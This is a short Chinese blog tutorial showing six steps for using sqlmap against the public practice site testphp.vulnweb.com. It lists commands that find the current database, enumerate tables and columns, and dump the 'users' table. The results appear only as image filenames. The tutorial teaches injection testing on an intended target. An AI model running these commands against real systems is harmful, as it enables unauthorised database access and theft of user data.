首页 > 代码库 > 六步骤活用SQLMap(以testphp.vulnweb.com为测试靶机)

六步骤活用SQLMap(以testphp.vulnweb.com为测试靶机)

1、搭建Python 2.7.X 和SQLmap环境;

2、使用web扫描工具(如ZAP等)找到SQL的可能注入点:“http://testphp.vulnweb.com/artists.php?artist=1”;

3、使用sqlmap 获取当前数据库名称

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db

运行结果如下:wKioL1P-AO2DO2XPAAJGUp-vATk381.jpg

4、使用sqlmap 列表名

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --table -D  acuart

运行结果如下:

wKioL1P-AceQvJtaAANn-y5MlLc705.jpg

5、使用sqlmap 列字段名称

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T users -D acuart -v 0

运行结果如下:

wKioL1P-AoCAg6fzAAJQvEsP7E0525.jpg

6、使用sqlmap 获取字段内容

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T users -D acuart -v 0

运行结果如下:

wKioL1P-BkKA-a4vAAM5LLU5mg4809.jpg

本文出自 “SOA安全” 博客,请务必保留此出处http://dannyqiu.blog.51cto.com/344039/1545942

六步骤活用SQLMap(以testphp.vulnweb.com为测试靶机)